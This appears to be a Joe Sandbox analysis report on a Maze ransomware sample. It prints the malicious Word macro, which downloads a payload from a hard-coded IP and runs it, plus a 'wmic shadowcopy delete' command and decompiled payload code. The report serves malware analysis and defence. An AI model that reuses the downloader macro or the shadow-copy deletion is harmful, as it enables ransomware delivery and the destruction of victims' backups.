Start time:	14:04:02
Start date:	06/11/2019
Path:	C:\Windows\System32\notepad.exe
Wow64 process (32bit):	false
Commandline:	'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DECRYPT-FILES.txt
Imagebase:	0x1c0000
File size:	179712 bytes
MD5 hash:	A4F6DF0E33E644E802C8798ED94D80EA
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Maze, Description: Yara detected Maze Ransomware, Source: 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp, Author: Joe Security
Reputation:	moderate

Chronological Activities

Analysis Process: WMIC.exe PID: 2780 Parent PID: 3780

General

Start time:	14:04:44
Start date:	06/11/2019
Path:	C:\Windows\System32\wbem\WMIC.exe
Wow64 process (32bit):	false
Commandline:	'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Imagebase:	0x910000
File size:	395776 bytes
MD5 hash:	A03CF3838775E0801A0894C8BACD2E56
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Disassembly

Code Analysis

VBA Code

Call Graph

Entrypoint
Decryption Function
Executed
Not Executed
Show Help

Module: Module1

Declaration

Line	Content
1	Attribute VB_Name = "Module1"
2	#if VBA7 then
3	Declare PtrSafe Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal pCaller as Long, ByVal szURL as String, ByVal szFileName as String, ByVal dwReserved as Long, ByVal lpfnCB as Long) as Long
7	#else
8	Declare Function URLDownloadToFile Lib "urlmon" Alias "URLDownloadToFileA"(ByVal pCaller as Long, ByVal szURL as String, ByVal szFileName as String, ByVal dwReserved as Long, ByVal lpfnCB as Long) as Long
12	#endif

Executed Functions

Function dwn1, APIs: 1, Strings: 0, Number of lines: 3, Relevance: 12.253

APIs	Meta Information
urlmon!URLDownloadToFileA	urlmon!URLDownloadToFileA(0,"http://104.168.198.208/wordupd.tmp","C:\Windows\Temp\wupd12.14.tmp",0,0)

Line	Instruction	Meta Information
14	Function dwn1(v1, v2)
15	URLDownloadToFile 0, v1, v2, 0, 0	urlmon!URLDownloadToFileA(0,"http://104.168.198.208/wordupd.tmp","C:\Windows\Temp\wupd12.14.tmp",0,0) executed
16	End Function

Subroutine St, APIs: 10, Strings: 1, Number of lines: 13, Relevance: 16.513

APIs	Meta Information
Part of subcall function Dc@Module1: Split
TB1
Part of subcall function Dc@Module1: Split
TB2
IsObject
Part of subcall function dwn1@Module1: URLDownloadToFile
Part of subcall function St1@Module1: VarType
Part of subcall function St1@Module1: Shell
Part of subcall function Msg@Module1: MsgBox
Part of subcall function Msg@Module1: Title

Strings	Decrypted Strings
"This applic""ation appears to ha""ve been made with an older version of the Micro""soft Office product suite. Please have the author save this document to a newer and sup""ported format. [Er""ror Code: -21""9]"

Line	Instruction	Meta Information
17	Sub St()
18	Dim url1 as String	executed
19	url1 = Dc(UF1.TB1.Text)	TB1
20	Dim path1 as String
21	path1 = Dc(UF1.TB2.Text)	TB2
22	Dim obj1 as Object
23	If IsObject(obj1) = True Then	IsObject
24	dwn1 url1, path1
25	Endif
27	St1 path1
29	mess = "This applic" & "ation appears to ha" & "ve been made with an older version of the Micro" & "soft Office product suite. Please have the author save this document to a newer and sup" & "ported format. [Er" & "ror Code: -21" & "9]"
30	Msg mess
31	End Sub

Function Dc, APIs: 4, Strings: 1, Number of lines: 4, Relevance: 7.504

APIs	Meta Information
Split
Part of subcall function Dc2@Module1: LBound
Part of subcall function Dc2@Module1: UBound
Part of subcall function Dc2@Module1: Chr

Strings	Decrypted Strings
","

Line	Instruction	Meta Information
35	Function Dc(decoded)
36	myArray = Split(decoded, ",", - 1)	Split executed
37	Dc = Dc2(myArray)
38	End Function

Function St1, APIs: 2, Strings: 0, Number of lines: 5, Relevance: 4.505

APIs	Meta Information
VarType
Shell	Shell("C:\Windows\Temp\wupd12.14.tmp")

Line	Instruction	Meta Information
52	Function St1(v1 as String)
53	If VarType(v1) = 8 Then	VarType executed
54	Shell v1	Shell("C:\Windows\Temp\wupd12.14.tmp") executed
55	Endif
56	End Function

Function Dc2, APIs: 3, Strings: 0, Number of lines: 11, Relevance: 3.761

APIs	Meta Information
LBound
UBound
Chr

Line	Instruction	Meta Information
40	Function Dc2(a1)
41	Dim b1 as String	executed
42	Dim s1 as String
43	lb1 = LBound(a1)	LBound
44	ub1 = UBound(a1)	UBound
45	For o1 = lb1 To ub1
46	b1 = Chr(a1(o1))	Chr
47	s1 = s1 + b1
48	Next o1
49	Dc2 = s1
50	End Function

Non-Executed Functions

Subroutine Msg, APIs: 2, Strings: 0, Number of lines: 3, Relevance: 2.503

APIs	Meta Information
MsgBox
Title

Line	Instruction	Meta Information
32	Sub Msg(mess)
33	MsgBox mess, 16, Title	MsgBox Title
34	End Sub

Module: ThisDocument

Declaration

Line	Content
1	Attribute VB_Name = "ThisDocument"
2	Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = True
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = True
9	Attribute VB_Control = "Ink1, 0, 0, INKEDLib, InkEdit"

Executed Functions

Subroutine Ink1_GotFocus, APIs: 3, Strings: 0, Number of lines: 3, Relevance: 3.753

APIs	Meta Information
Part of subcall function St@Module1: TB1
Part of subcall function St@Module1: TB2
Part of subcall function St@Module1: IsObject

Line	Instruction	Meta Information
10	Private Sub Ink1_GotFocus()
11	St	executed
12	End Sub

Module: UF1

Declaration

Line	Content
1	Attribute VB_Name = "UF1"
2	Attribute VB_Base = "0{B99EA3B4-BAF5-4E1D-A5A2-9A2A4E8082E0}{4ADC8F2A-C37A-4327-9721-3242DE16CC9E}"
3	Attribute VB_GlobalNameSpace = False
4	Attribute VB_Creatable = False
5	Attribute VB_PredeclaredId = True
6	Attribute VB_Exposed = False
7	Attribute VB_TemplateDerived = False
8	Attribute VB_Customizable = False

Non-Executed Functions

Subroutine TextBox1_Change, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
10	Private Sub TextBox1_Change()
12	End Sub

Subroutine TextBox2_Change, APIs: 0, Strings: 0, Number of lines: 2, Relevance: 0.002

Line	Instruction	Meta Information
14	Private Sub TextBox2_Change()
16	End Sub

Reset < >

Analysis Process: wupd12.14.tmp PID: 3780 Parent PID: 3180 wupd12.14.tmpUNIQUE

Execution Graph

Execution Coverage:	0.8%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	28.7%
Total number of Nodes:	1451
Total number of Limit Nodes:	3

Executed Functions

Function 004027DF, Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 335memoryUNIQUE

Download Yara Rule

APIs

CloseHandle.KERNEL32(004015B3,00401594,?,?,?,00401561,?), ref: 004015A9
AdjustWindowRect.USER32(?,?,?,00401561,?), ref: 004015F3
HeapAlloc.KERNEL32 ref: 0040168B
LsaQueryTrustedDomainInfo.ADVAPI32(00402862,?,0043C410,00402804,004027D2,42EA18BA,00001E00,?,?), ref: 00402858
CloseWindow.USER32(00402891,?,0043C414,?,0043C410,00402804,004027D2,42EA18BA,00001E00,?,?), ref: 00402887

Strings

83729304958372930dhejskrlt9483s, xrefs: 00402A17

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: CloseWindow$AdjustAllocDomainHandleHeapInfoQueryRectTrusted
String ID: 83729304958372930dhejskrlt9483s
API String ID: 937018832-3668622996
Opcode ID: 4534eff31e68d4195baab82e60d17e3190177574751bacdc50b36a30e7f61e8a
Instruction ID: 640a3222fefb3eccbdad1c19f00b7df37c152d2aa1f5ce8679fa37238f9f690e
Opcode Fuzzy Hash: 4534eff31e68d4195baab82e60d17e3190177574751bacdc50b36a30e7f61e8a
Instruction Fuzzy Hash: 46C14AB1508380AFC7129B609C45B673FB4EF56308F0954ABE4C59B2E3D2789918C76B

Uniqueness

Uniqueness Score: 100.00%

Function 004029A0, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 162
threadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E004029A0() {
				signed int* _t39;
				signed int _t41;
				void* _t48;
				intOrPtr _t53;
				char* _t54;
				void* _t59;
				signed int _t62;
				intOrPtr* _t63;
				char* _t68;
				intOrPtr _t71;
				char* _t72;
				void* _t74;
				intOrPtr* _t75;
				intOrPtr _t76;
				signed int* _t78;
				signed int _t80;
				intOrPtr* _t81;
				void* _t82;
				void* _t86;
				void* _t88;
				intOrPtr* _t89;
				void* _t90;
				void* _t91;
				void* _t92;
				intOrPtr* _t93;

				asm("in al, dx");
				_t63 =  *((intOrPtr*)(_t81 + 0x64));
				_t71 =  *((intOrPtr*)(_t63 + 4));
				 *_t81 =  *_t63;
				_t39 = _t71 + 8;
				 *(_t81 + 0xc) = _t39;
				E0043B583(_t39);
				_t82 = _t81 + 4;
				_t78 = _t39;
				_t41 = GetTickCount() ^ 0x0000029a;
				_t73 = _t82 + 8;
				 *(_t82 + 8) = _t41;
				E00423B90(_t82 + 8);
				 *_t78 = _t41;
				E00423B90(_t82 + 8);
				_t78[0] = _t41;
				E00423B90(_t73);
				_t78[1] = _t41;
				E00423B90(_t73);
				_t86 = _t82 + 0x10;
				_t78[1] = _t41;
				_t74 = _t86 + 0x10;
				_push(0x40);
				E004374C0(_t74, "83729304958372930dhejskrlt9483s", 0x100);
				E00437530(_t74, _t78);
				_t88 = _t86 + 0x18;
				 *(_t88 + 4) = _t78;
				_push(_t71);
				_push( &(_t78[2]));
				_push( *((intOrPtr*)(_t88 + 8)));
				_push(_t74);
				E00437560();
				_t89 = _t88 + 0x10;
				 *(_t89 + 0x10) = 0;
				if( *((intOrPtr*)(_t63 + 8)) == 0) {
					_push(_t89 + 8);
					_push(_t89 + 0x14);
					_push( *((intOrPtr*)(_t89 + 0x14)));
					E00402BB0( *((intOrPtr*)(_t63 + 0xc)),  *((intOrPtr*)(_t89 + 4)));
					_t89 = _t89 + 0xc;
					_t48 =  *(_t89 + 0x10);
					if(_t48 != 0) {
						VirtualFree(_t48, 0, 0x8000);
					}
				} else {
					_t76 =  *((intOrPtr*)(_t63 + 0xc));
					if(_t76 == 0) {
						L16:
						L0043B58C( *((intOrPtr*)(_t89 + 4)));
						_t90 = _t89 + 4;
						_t75 =  *((intOrPtr*)(_t90 + 0x64));
						_t49 =  *((intOrPtr*)(_t75 + 0xc));
						if( *((intOrPtr*)(_t75 + 0xc)) != 0) {
							L0043B58C(_t49);
							_t90 = _t90 + 4;
						}
						_t50 =  *_t75;
						if( *_t75 != 0) {
							L0043B58C(_t50);
							_t90 = _t90 + 4;
						}
						E00423F80(_t75);
						_t89 = _t90 + 4;
						ExitThread(0);
					}
					_t63 =  *((intOrPtr*)( *((intOrPtr*)(_t89 + 0x64)) + 0x10));
					if(_t63 == 0) {
						goto L16;
					}
					asm("o16 nop [cs:eax+eax]");
					do {
						_t80 = 0;
						asm("o16 nop [cs:eax+eax]");
						while( *((char*)(_t76 + _t80)) != 0xd) {
							_t80 = _t80 + 1;
							_t63 = _t63 - 1;
							if(_t63 != 0) {
								continue;
							}
							_t53 = _t76 + _t80;
							_t63 = 0;
							L10:
							 *_t89 = _t53;
							_t21 = _t80 + 1; // 0x2
							_t54 = _t21;
							E0043B583(_t54);
							_t91 = _t89 + 4;
							_t72 = _t54;
							if(_t80 + 1 == 0) {
								goto L13;
							}
							_t68 = _t72;
							_t62 =  !_t80;
							do {
								 *_t68 = 0;
								_t68 = _t68 + 1;
								_t62 = _t62 + 1;
							} while (_t62 != 0);
							goto L13;
						}
						_t53 = _t76 + _t80;
						goto L10;
						L13:
						E0043ACD0(_t72, _t76, _t80);
						_t92 = _t91 + 0xc;
						_push(_t92 + 8);
						_push(_t92 + 0x14);
						_push( *((intOrPtr*)(_t92 + 0x14)));
						E00402BB0(_t72,  *((intOrPtr*)(_t92 + 4)));
						_t93 = _t92 + 0xc;
						_t59 =  *(_t93 + 0x10);
						if(_t59 != 0) {
							VirtualFree(_t59, 0, 0x8000); // executed
							 *(_t93 + 0x10) = 0;
						}
						_t76 =  *_t93 + 2;
						L0043B58C(_t72);
						_t89 = _t93 + 4;
					} while (_t63 != 0);
				}
			}

0x004029a5
0x004029a7
0x004029ad
0x004029b0
0x004029b3
0x004029b6
0x004029bb
0x004029c0
0x004029c3
0x004029cb
0x004029d0
0x004029d4
0x004029d9
0x004029e1
0x004029e6
0x004029ee
0x004029f3
0x004029fb
0x00402a00
0x00402a05
0x00402a08
0x00402a0c
0x00402a10
0x00402a1d
0x00402a27
0x00402a2c
0x00402a2f
0x00402a36
0x00402a37
0x00402a38
0x00402a3c
0x00402a3d
0x00402a42
0x00402a45
0x00402a51
0x00402b7e
0x00402b83
0x00402b84
0x00402b88
0x00402b8d
0x00402b90
0x00402b96
0x00402ba0
0x00402ba0
0x00402a57
0x00402a57
0x00402a5c
0x00402b33
0x00402b37
0x00402b3c
0x00402b3f
0x00402b43
0x00402b48
0x00402b4b
0x00402b50
0x00402b50
0x00402b53
0x00402b57
0x00402b5a
0x00402b5f
0x00402b5f
0x00402b63
0x00402b68
0x00402b6d
0x00402b6d
0x00402a66
0x00402a6b
0x00000000
0x00000000
0x00402a71
0x00402a80
0x00402a80
0x00402a82
0x00402a90
0x00402a96
0x00402a97
0x00402a98
0x00000000
0x00000000
0x00402a9a
0x00402a9d
0x00402ab3
0x00402ab3
0x00402ab6
0x00402ab6
0x00402aba
0x00402abf
0x00402ac4
0x00402ac7
0x00000000
0x00000000
0x00402acb
0x00402acd
0x00402ad0
0x00402ad0
0x00402ad3
0x00402ad4
0x00402ad4
0x00000000
0x00402ad0
0x00402ab0
0x00000000
0x00402ad7
0x00402ada
0x00402adf
0x00402aec
0x00402af1
0x00402af2
0x00402af6
0x00402afb
0x00402afe
0x00402b04
0x00402b0e
0x00402b14
0x00402b14
0x00402b1f
0x00402b23
0x00402b28
0x00402b2b
0x00402a80

APIs

GetTickCount.KERNEL32 ref: 004029C5
_memmove.LIBCMT ref: 00402ADA
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402B0E
ExitThread.KERNEL32 ref: 00402B6D
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00402BA0

Strings

83729304958372930dhejskrlt9483s, xrefs: 00402A17

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: FreeVirtual$CountExitThreadTick_memmove
String ID: 83729304958372930dhejskrlt9483s
API String ID: 3005252621-3668622996
Opcode ID: f59c972749c7b730c2c6a3f6a85d449cfe84db73074e4308a2a19b675a62d459
Instruction ID: 76747a2ee55bd400e039e887143bfb3be7d71e5d3861fa30de528cb9b6cf7195
Opcode Fuzzy Hash: f59c972749c7b730c2c6a3f6a85d449cfe84db73074e4308a2a19b675a62d459
Instruction Fuzzy Hash: A75194B5A04344ABD710EF61DD45B6B77E8EF44708F04443EF989A7282E778E9048B9A

Uniqueness

Uniqueness Score: 100.00%

Function 00402E40, Relevance: 6.1, APIs: 4, Instructions: 78
threadUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_memmove.LIBCMT ref: 00402E67
_memmove.LIBCMT ref: 00402ECF
CreateThread.KERNEL32(00000000,00000000,Function_000029A0,00000000,00000000,00000000), ref: 00402EE5
CloseHandle.KERNEL32(00000000), ref: 00402EF0

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID: _memmove$CloseCreateHandleThread
String ID:
API String ID: 3943734325-0
Opcode ID: 1044a33844eb75bb876378585b64c719af9c4e4bd36ab44366b6d0e041353b6d
Instruction ID: ab306095c67c6fd12ad0cc8c5ad98e9b253d54b50273c4596c937d37064070ac
Opcode Fuzzy Hash: 1044a33844eb75bb876378585b64c719af9c4e4bd36ab44366b6d0e041353b6d
Instruction Fuzzy Hash: A221A1B1A403497BDB009F61AC45F977BACEB55708F04443AF9089B382F679E61487AA

Uniqueness

Uniqueness Score: 100.00%

Function 004C1278, Relevance: 1.4, Strings: 1, Instructions: 163
UNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

j, xrefs: 004C10BB

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: j
API String ID: 0-2639687660
Opcode ID: ede8a3f29f66a7c7bca81374cb5b682be72f14e58590c9f57038acbdd8df1b25
Instruction ID: 835b61b37ad960453fd80e509e08da5e486049018712eff2f0c71cb37acd28d3
Opcode Fuzzy Hash: ede8a3f29f66a7c7bca81374cb5b682be72f14e58590c9f57038acbdd8df1b25
Instruction Fuzzy Hash: E361C332910201ABFF109F65C98AB593B75FF45309F0881BEED086D19AC7798A34DB28

Uniqueness

Uniqueness Score: 100.00%

Function 004C726A, Relevance: 1.3, Strings: 1, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

@, xrefs: 004C729F

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 423d3003dd239f6f45c8f7f6520c9c9c981f60bd11e28bdd7f7c9b3d86f05f69
Instruction ID: 76d71ef1502eb596fc669ec10ee0293f8175fdc0e62b3283b1a56d7de1eb3f55
Opcode Fuzzy Hash: 423d3003dd239f6f45c8f7f6520c9c9c981f60bd11e28bdd7f7c9b3d86f05f69
Instruction Fuzzy Hash: E6118676500100AFEF40CF1DD880B6AB3B5BF88324B194269EC18AB342C734BC65CAA8

Uniqueness

Uniqueness Score: 0.02%

Function 004CA141, Relevance: .1, Instructions: 69
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.595494155.004C0000.00000040.00000001.sdmp, Offset: 004C0000, based on PE: true

Associated: 00000005.00000002.595544156.00501000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_4c0000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 328423ad2b7d35f550c77bf867485840cbc5d7fb6fc170361f24388b5b8387e5
Instruction ID: 418502cd0b8ada0fa117757dbe0a39cbb472f95579e8078bd9e6a96ef912f6ad
Opcode Fuzzy Hash: 328423ad2b7d35f550c77bf867485840cbc5d7fb6fc170361f24388b5b8387e5
Instruction Fuzzy Hash: 64216D76D00219EFDB508F98C840B89B7B4FF14369F28856AE944A7240D778ADA0CB95

Uniqueness

Uniqueness Score: 0.00%

Non-executed Functions

Function 004219E0, Relevance: 34.1, APIs: 21, Instructions: 2579COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.595358303.00400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.595423095.00449000.00000040.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_wupd12.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 66d8fe82808ab8b4e98bc8c00e14dd33f49bcb97c68e6c713f71a8c5780b1cb0
Instruction ID: 25ae5ea51bfe99ae4647f6beb111e30d758084f14db9a4cf34a27dcb47fa844a
Opcode Fuzzy Hash: 66d8fe82808ab8b4e98bc8c00e14dd33f49bcb97c68e6c713f71a8c5780b1cb0
Instruction Fuzzy Hash: 61E2D96BB143A11BFB254974E9E93E71792DBB5721FD91137CE468B7E2C48E0E438208

Uniqueness

Uniqueness Score: 0.00%

Function 004010A0, Relevance: 22.8, APIs: 15, Instructions: 262
filememoryUNIQUE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E004010A0(void* __ebx, void* __edi, void* __esi) {
				signed int _t92;
				struct _OSVERSIONINFOA* _t93;
				char* _t105;
				char _t110;
				void* _t115;
				intOrPtr* _t127;
				intOrPtr* _t129;
				char* _t139;
				void* _t140;
				char* _t145;
				intOrPtr _t152;
				void* _t153;
				char _t161;
				void* _t162;
				intOrPtr _t163;
				int _t165;
				void* _t168;
				CHAR* _t170;
				char* _t173;
				void* _t175;
				CHAR* _t177;
				void* _t179;

				_t177 = _t179 - 0x128;
				_push(0xfffffffe);
				_push( *0x45c2d4);
				_push( *E00401010);
				_push( *[fs:0x0]);
				_t92 =  *0x45c2d0; // 0x0
				 *(_t177 - 8) =  *(_t177 - 8) ^ _t92;
				_t93 = _t92 ^ _t177;
				_t177[0x124] = _t93;
				_t170 = _t177[0x130];
				 *(_t177 - 0x2c) = _t170;
				 *(_t177 - 0x28) = 0;
				 *(_t177 - 0x1c) = 0;
				 *(_t177 - 0x24) = 0;
				 *((intOrPtr*)(_t177 - 4)) = 0;
				 *(_t177 - 0x1d) = 1;
				 *0x45c2dc = 0x94;
				if(GetVersionExA(_t93) != 0 &&  *0x45c2ec != 1) {
					 *(_t177 - 0x1d) = 0;
				}
				if( *(_t177 - 0x1d) != 0) {
					_t177[0x108] = 0x60;
					_t177[0x109] = 0x4b;
					_t177[0x10a] = 0x55;
					_t177[0x10b] = 0x52;
					_t177[0x10c] = 0x55;
					_t177[0x10d] = 0x52;
					_t177[0x10e] = 0x55;
					_t177[0x10f] = 0x48;
					_t177[0x110] = 0x12;
					_t177[0x111] = 0x55;
					_t177[0x112] = 0x52;
					_t177[0x113] = 0x55;
					_t177[0x114] = 0;
					_t177[0x118] = 0x67;
					_t177[0x119] = 0x4e;
					_t177[0x11a] = 0x59;
					_t177[0x11b] = 0x52;
					_t177[0x11c] = 0x5d;
					_t177[0x11d] = 0x51;
					_t177[0x11e] = 0x59;
					_t177[0x11f] = 0x61;
					_t177[0x120] = 0;
					E00401020( &(_t177[0x108]),  &(_t177[0x108]));
					E00401020( &(_t177[0x118]),  &(_t177[0x118]));
					_push(0x105);
					_push(0);
					E0043AC40();
					_t165 = GetWindowsDirectoryA(_t177, 0x104);
					_t139 =  &(_t177[0x108]);
					_t105 =  &(_t139[1]);
					do {
						_t161 =  *_t139;
						_t139 =  &(_t139[1]);
					} while (_t161 != 0);
					_t140 = _t139 - _t105;
					_t106 = _t140 + _t165 + 1;
					if(_t140 + _t165 + 1 > 0x104) {
						L29:
						 *((intOrPtr*)(_t177 - 4)) = 0xfffffffe;
						E00401040(_t106);
						 *[fs:0x0] =  *((intOrPtr*)(_t177 - 0x10));
						return E00401080( *(_t177 - 0x28));
					}
					_t145 =  &(_t177[0x108]);
					_t173 =  &(_t145[1]);
					do {
						_t110 =  *_t145;
						_t145 =  &(_t145[1]);
					} while (_t110 != 0);
					E0043ACD0( &(_t177[_t165]),  &(_t177[0x108]), _t145 - _t173 + 1);
					_t115 = CreateFileA(_t177, 0x80000000, 1, 0, 3, 0x80, 0);
					 *(_t177 - 0x1c) = _t115;
					if(_t115 == 0xffffffff) {
						 *(_t177 - 0x38) = 0;
						_t106 = GetFileSize(_t115, _t177 - 0x38);
						 *(_t177 - 0x34) = _t106;
						if( *(_t177 - 0x38) != 0) {
							goto L29;
						}
						_t106 = LocalAlloc(0x40, _t106 + 1);
						 *(_t177 - 0x24) = _t106;
						if(_t106 == 0 || ReadFile( *(_t177 - 0x1c),  *(_t177 - 0x24),  *(_t177 - 0x34), _t177 - 0x30, 0) == 0) {
							goto L29;
						} else {
							CloseHandle( *(_t177 - 0x1c));
							 *(_t177 - 0x1c) = 0;
							_t106 = CreateFileA(_t177, 0x40000000, 2, 0, 3, 0x80, 0);
							 *(_t177 - 0x1c) = _t106;
							if(_t106 == 0xffffffff) {
								goto L29;
							}
							_t175 =  *(_t177 - 0x24);
							_t168 = E0043B320(_t175, _t177 - 0x118);
							_push(0);
							_push(_t177 - 0x30);
							if(_t168 != 0) {
								if(WriteFile( *(_t177 - 0x1c), _t175, _t168 - _t175, ??, ??) == 0) {
									goto L29;
								}
								_push(_t177);
								_push( *(_t177 - 0x2c));
								if(E00401060(_t177 - 0x118, _t177 - 0x118) == 0) {
									goto L29;
								}
								_t127 = _t177 - 0x118;
								_t162 = _t127 + 1;
								do {
									_t152 =  *_t127;
									_t127 = _t127 + 1;
								} while (_t152 != 0);
								 *(_t177 - 0x2c) = _t127 - _t162;
								_t129 = _t177 - 0x118;
								_t153 = _t129 + 1;
								do {
									_t163 =  *_t129;
									_t129 = _t129 + 1;
								} while (_t163 != 0);
								_t106 = WriteFile( *(_t177 - 0x1c), _t129 - _t153 + _t168,  *(_t177 - 0x24) -  *(_t177 - 0x2c) - _t168 +  *(_t177 - 0x34), _t177 - 0x30, 0);
								L27:
								if(_t106 != 0) {
									 *(_t177 - 0x28) = 1;
								}
								goto L29;
							}
							if(WriteFile( *(_t177 - 0x1c), _t175,  *(_t177 - 0x30), ??, ??) == 0) {
								goto L29;
							}
							_push(_t177);
							_push( *(_t177 - 0x2c));
							_t106 = E00401060(_t177 - 0x118, _t177 - 0x118);
							goto L27;
						}
					}
					_push(_t177);
					_push( *(_t177 - 0x2c));
					if(E00401060( &(_t177[0x118]),  &(_t177[0x118])) != 0) {
						 *(_t177 - 0x28) = 0x80;
					}
					goto L29;
				}
				_t106 = MoveFileExA(_t170, 0, 4);
				goto L27;
			}

0x004010a1
0x004010ae
0x004010b0
0x004010b6
0x004010c2
0x004010c6
0x004010cb
0x004010ce
0x004010d0
0x004010e3
0x004010e9
0x004010ee
0x004010f1
0x004010f4
0x004010f7
0x004010fa
0x00401101
0x00401113
0x0040111e
0x0040111e
0x00401124
0x00401135
0x0040113c
0x00401143
0x0040114a
0x00401151
0x00401158
0x0040115f
0x00401166
0x0040116d
0x00401174
0x0040117b
0x00401182
0x00401189
0x0040118f
0x00401196
0x0040119d
0x004011a4
0x004011ab
0x004011b2
0x004011b9
0x004011c0
0x004011c7
0x004011d4
0x004011e0
0x004011e5
0x004011ea
0x004011ee
0x00401206
0x00401208
0x0040120e
0x00401211
0x00401211
0x00401213
0x00401214
0x00401218
0x0040121a
0x00401220
0x004013e4
0x004013e4
0x004013eb
0x004013f6
0x00401415
0x00401415
0x00401226
0x0040122c
0x0040122f
0x0040122f
0x00401231
0x00401232
0x00401246
0x00401269
0x0040126b
0x00401271
0x0040129f
0x004012a7
0x004012ad
0x004012b3
0x00000000
0x00000000
0x004012bd
0x004012c3
0x004012c8
0x00000000
0x004012ea
0x004012ed
0x004012f3
0x00401306
0x00401308
0x0040130e
0x00000000
0x00000000
0x0040131b
0x00401326
0x00401328
0x0040132c
0x0040132f
0x00401377
0x00000000
0x00000000
0x0040137c
0x0040137d
0x00401397
0x00000000
0x00000000
0x00401399
0x0040139f
0x004013a2
0x004013a2
0x004013a4
0x004013a5
0x004013ab
0x004013ae
0x004013b4
0x004013b7
0x004013b7
0x004013b9
0x004013ba
0x004013d7
0x004013d9
0x004013db
0x004013dd
0x004013dd
0x00000000
0x004013db
0x00401340
0x00000000
0x00000000
0x00401349
0x0040134a
0x00401357
0x00000000
0x0040135c
0x004012c8
0x00401276
0x00401277
0x00401291
0x00401297
0x00401297
0x00000000
0x00401291
0x0040112a
0x00000000

APIs

GetVersionExA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,000000FE), ref: 0040110B
MoveFileExA.KERNEL32(?,00000000,00000004(MOVEFILE_DELAY_UNTIL_REBOOT),?,?,?,?,?,?,?,?,?,?,?,?,000000FE), ref: 0040112A
_memset.LIBCMT ref: 004011EE
GetWindowsDirectoryA.KERNEL32(00000000,00000104), ref: 00401200
_memmove.LIBCMT ref: 00401246
CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00401269
GetFileSize.KERNEL32(00000000,?), ref: 004012A7
LocalAlloc.KERNEL32(00000040,00000001), ref: 004012BD
ReadFile.KERNEL32(?,?,?,?,00000000), ref: 004012DC
CloseHandle.KERNEL32(?), ref: 004012ED
CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000003,00000080,00000000), ref: 00401306
_strstr.LIBCMT ref: 0040131F
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00401338
WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00401373
WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004013D7

Memory Dump Source

Source File: 00000005.00000002.595372430.00401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

